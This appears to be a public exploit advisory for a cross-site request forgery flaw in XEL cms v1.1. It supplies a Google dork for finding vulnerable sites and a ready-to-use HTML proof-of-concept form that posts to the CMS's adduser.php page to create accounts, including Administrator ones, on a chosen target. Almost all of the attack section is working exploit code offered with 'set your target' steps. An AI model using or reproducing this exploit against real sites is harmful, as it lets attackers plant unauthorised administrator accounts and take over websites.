====================================================================================================================================
| # Title     : XEL cms© v1.1 CSRF Vulnerability                                                                                   |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | 
| # Vendor    : https://cyberxel.com                                                                                               |  
| # Dork      : "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com"                                            |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Admin Panel : /xelcms/

[+] infected file : /xelcms/user/adduser.php

[+] line 07 set your target.

[+] save code as poc.html

    <style>
@import 'http://cyberxel.com/xelcms/styles/main.css';
#form1 table {
	font-size: 12px;
}
 </style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" /><span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2>
 </span><br><br><form id="form1" name="form1" method="post" action="TARGET_SITE/xelcms/user/adduser.php">
  <table width="99%" border="0" cellpadding="2" cellspacing="2">
    <tr>
      <td width="8%">Username:</td>
      <td width="92%"><label>
        <input name="username" type="text" id="username" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Password:</td>
      <td><label>
        <input name="password" type="password" id="password" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
	<tr>
      <td>Confirm password:</td>
      <td><label>
        <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Type:</td>
      <td><label>
        <select name="type" id="type" style="font-size: 10px;width:300">
          <option value="" selected></option>
		  <option value="Administrator">Administrator</option>
          <option value="User">User</option>
        </select>
      </label></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td>
        <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" />
      </td>
    </tr>
  </table>
</form>



Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================